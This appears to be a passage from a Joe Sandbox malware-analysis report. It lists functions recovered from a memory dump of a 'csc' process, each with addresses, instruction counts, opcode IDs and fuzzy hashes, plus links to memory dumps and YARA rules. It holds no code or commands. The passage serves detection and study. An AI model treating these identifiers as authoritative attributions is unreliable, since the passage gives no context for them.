                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79de11b61ec65d1340d0ae8279c2bad2ed487de85e62206cc4b27274b6a64999
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5801DB3A2082019BCF1DDF7E955C561FBE9FB5921570409AAE506C3F14D632EA43C710
                                                                                                                                                                                                                                                                                  Function 05C624A2 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: b5510ef770586d8edb6cd4a2affde985e16c73e35a57ba4943b0f637fcb0d6b5
                                                                                                                                                                                                                                                                                  • Instruction ID: 0948ea24836c9472ef326438211aaf37bc278e243dfae8338227b0c6d72d0de3
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5510ef770586d8edb6cd4a2affde985e16c73e35a57ba4943b0f637fcb0d6b5
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17F0F432741AA0B7C732DF5A8D84F57BEA9EBC4F50F108829BA0597640C670DE01E7A0
                                                                                                                                                                                                                                                                                  Function 05D351B6 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 326f36494f66409060b48fb7b660431b37dbbc01e58c50658b2ec0bdf8aa89ed
                                                                                                                                                                                                                                                                                  • Instruction ID: 882d4ec5b50713b2048f8b474f4f6c01d7877c6d83cf895ed3b7f532ac218bd1
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 326f36494f66409060b48fb7b660431b37dbbc01e58c50658b2ec0bdf8aa89ed
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6116D78E10259EFCB04DFA8D445A9EBBB4EF08704F14845AB915EB340EB74DA02CB54
                                                                                                                                                                                                                                                                                  Function 05C95654 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                                                                                                                                                                                                  • Instruction ID: 707e09cea209bc96c44e52b45871c6af22c9ccfb5fc30d9d08eeaa66653b8b1d
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87F0FFB2A05214AFE71ACF5CC944F6ABBEDEF45610F054069E501DB220E671DE04CA94
                                                                                                                                                                                                                                                                                  Function 05CED4A0 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: d4d7f01aad39c7dd95e5e6c6de0bf45d37c6be98fa301dcb6872b147ed8fb2b5
                                                                                                                                                                                                                                                                                  • Instruction ID: 6f5931c812d253bc7dc5b2ef85d079ac99a59cbd695e46574fc0e36c6136bed4
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4d7f01aad39c7dd95e5e6c6de0bf45d37c6be98fa301dcb6872b147ed8fb2b5
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76F0C232381A84A7CE3577A48D5CF1A6629EBC0EA4F540C29BA031FA90CA64CC02F791
                                                                                                                                                                                                                                                                                  Function 05D1F409 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: ea777c73808bb90ab244620fcaa5825e20068918e2bcef52632df4a59ba2d489
                                                                                                                                                                                                                                                                                  • Instruction ID: caf5d18dfcf60d90eeaa19e6f0e1d10fff84536184e1be1a5dec283156f37cfa
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea777c73808bb90ab244620fcaa5825e20068918e2bcef52632df4a59ba2d489
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93F0C872B10358AFDB04EBB9D809AAEBBB8EF44714F00849BF511FB290DE74D9019765
                                                                                                                                                                                                                                                                                  Function 05C9716D Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
                                                                                                                                                                                                                                                                                  • Instruction ID: 69c216ef376967105f8256b1c59e5b977c17982742cbb2e33b352296d09c4cd5
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0F04C72B162546BEF18D7A48848FAABBE9EF82614F084C559D07A7144D630DB4083A4
                                                                                                                                                                                                                                                                                  Function 05CEA130 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: b3c6a08773497b4b98ae20c10b825f65a4f6eca6942d73dfe774fb1702a192bf
                                                                                                                                                                                                                                                                                  • Instruction ID: cdb8a1c2f7b807283a512500094c47b58d1419a2346f2824e974fe700bdf336d
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3c6a08773497b4b98ae20c10b825f65a4f6eca6942d73dfe774fb1702a192bf
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6019736111259EFCF129F94DC44EDA7FA6FB4C754F068501FE1866220C632E970EB80
                                                                                                                                                                                                                                                                                  Function 05C9648A Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 7efde16b51fe89ae71073ddb97d7335ca9772d2af92d0320199b96fd7a086da2
                                                                                                                                                                                                                                                                                  • Instruction ID: 8cab37a041f400409fb89f14886a69864e47775bd163caeaa2ed1eaa08e5d42a
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7efde16b51fe89ae71073ddb97d7335ca9772d2af92d0320199b96fd7a086da2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3701D1B03446809BFF2ACB68CD4DB2577A9FB00B10F080D91BA13DB6D1DBA8D9408120
                                                                                                                                                                                                                                                                                  Function 05CEC51D Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 3251e16c8dac1ff86ec8d1bd15196dfadc7d2c666ff41846cadf0927e4749fd6
                                                                                                                                                                                                                                                                                  • Instruction ID: e805b1b912d575b1fc137862d0faa8f605db21ff03f8c8a836eff210b988ef57
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3251e16c8dac1ff86ec8d1bd15196dfadc7d2c666ff41846cadf0927e4749fd6
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCF0A4712057449FD714EF68C445A1ABBE4EF48B04F404A5AB8A9DB380EA34EA00D756
                                                                                                                                                                                                                                                                                  Function 05C90774 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                                                                                                                                                                                                                  • Instruction ID: a53edf8ac6025fdf059236b5af6a1b7dd5c77954355edc2b1522223b9b59b55f
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FEF0B472610204AFE719DB25CD0DB56B7F9EFA8720F1588789805E7260FBB1DE40D614
                                                                                                                                                                                                                                                                                  Function 05D35149 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 42f2020ade540c61a2b1a6416e554132413bd59f8e554c3e18acd11c8604c19e
                                                                                                                                                                                                                                                                                  • Instruction ID: a270888b5e81bef8387caad84934b4b3dd16c4e7ec9abc6a0a8fe24e36c9b337
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42f2020ade540c61a2b1a6416e554132413bd59f8e554c3e18acd11c8604c19e
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0F04474A01249AFDB04EFA8D945A9DBBF4FF08704F10445AF515EB380EA74DA00DB54
                                                                                                                                                                                                                                                                                  Function 05C6471B Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 355635b1e511070233af4bd287ad60c14f7fc8123b3a384c0504adc39f9b8f3d
                                                                                                                                                                                                                                                                                  • Instruction ID: 069410da9beb9c56da03538e2c2acb1af87c8390e04e0a9dac21a08d7f7735fd
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 355635b1e511070233af4bd287ad60c14f7fc8123b3a384c0504adc39f9b8f3d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FF02EF1905298CEDF3DC324C0C8FA177FAAB03270F088C66C42A8B511CB24DB84C652
                                                                                                                                                                                                                                                                                  Function 05C9C50D Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 0891782ced91eb134c319edf1d3c023917face5a437ef4c1dc91b5cc4ea59059
                                                                                                                                                                                                                                                                                  • Instruction ID: 1184b4bbfb08e734c258f57d538e2e4ba413e4c273524a2e78420a944c3e9d47
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0891782ced91eb134c319edf1d3c023917face5a437ef4c1dc91b5cc4ea59059
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65F052B1115284CFCF29E39CC04CB2173E4AB01664F098C21C40787941C624CE80E280
                                                                                                                                                                                                                                                                                  Function 05CA2539 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                                                                                                                                                                                                                  • Instruction ID: 466109c47f7ded62819fbc57e99c6ec5e15f3cac4c8fbc8a8e11d974aa0ff755
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FAE092727405412BD7119E598CD8F477B9EEFD2714F040879B9045E142CAE69D0992A0
                                                                                                                                                                                                                                                                                  Function 05D1F7CF Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 29be543b92618aa32fb441b13d0ed74da2e9df99f383687be14e3f0d2c55fe97
                                                                                                                                                                                                                                                                                  • Instruction ID: a758c68409ebea3e46ac93a3d602ff6c1cf1a70f78b9e46001c9166f1a71fe8b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29be543b92618aa32fb441b13d0ed74da2e9df99f383687be14e3f0d2c55fe97
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81F082B1B00249ABDB04DBE8D94AA5EBBB8EF08708F540499F502EB280DD74D9409729
                                                                                                                                                                                                                                                                                  Function 05D1F717 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: bc689cd6628b2ad601f529c39872e63a7a36ccc354835a06be7b796d95e728d7
                                                                                                                                                                                                                                                                                  • Instruction ID: b0ce55c7a977f7368b61af0f39327caa279667754a4a4359f723fceb02041000
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc689cd6628b2ad601f529c39872e63a7a36ccc354835a06be7b796d95e728d7
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59F08275A04249ABDB04DBA8D94AA5EBBB8AF08708F000499F602EB281DA74D900D768
                                                                                                                                                                                                                                                                                  Function 05C97128 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 5259a64f0d43843facbf69c361050490ca3d8e662594583cdae4e7cecdc8d705
                                                                                                                                                                                                                                                                                  • Instruction ID: cf3d71dd2c6e635c290b467745fba3e97624563503cca579cae75a09c7bfb824
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5259a64f0d43843facbf69c361050490ca3d8e662594583cdae4e7cecdc8d705
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5F0E231D156548FCF24D729C088F31B3D5FB40674F0D9861DE19C7901C3B4DA40C2A0
                                                                                                                                                                                                                                                                                  Function 05C9174A Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: b791057a32afe85e8936a5233a0d9971e4c132c3884011bb6e17e7880981a41b
                                                                                                                                                                                                                                                                                  • Instruction ID: b6a8ff770b897779884ddc9d761acf7bdd2af247a01422d647f12af1d026e925
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b791057a32afe85e8936a5233a0d9971e4c132c3884011bb6e17e7880981a41b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38E09277B018236BD2119A18AC05F66B7AEEBE4650F090876F504C7214DA28DD02C7E0
                                                                                                                                                                                                                                                                                  Function 05C954E0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
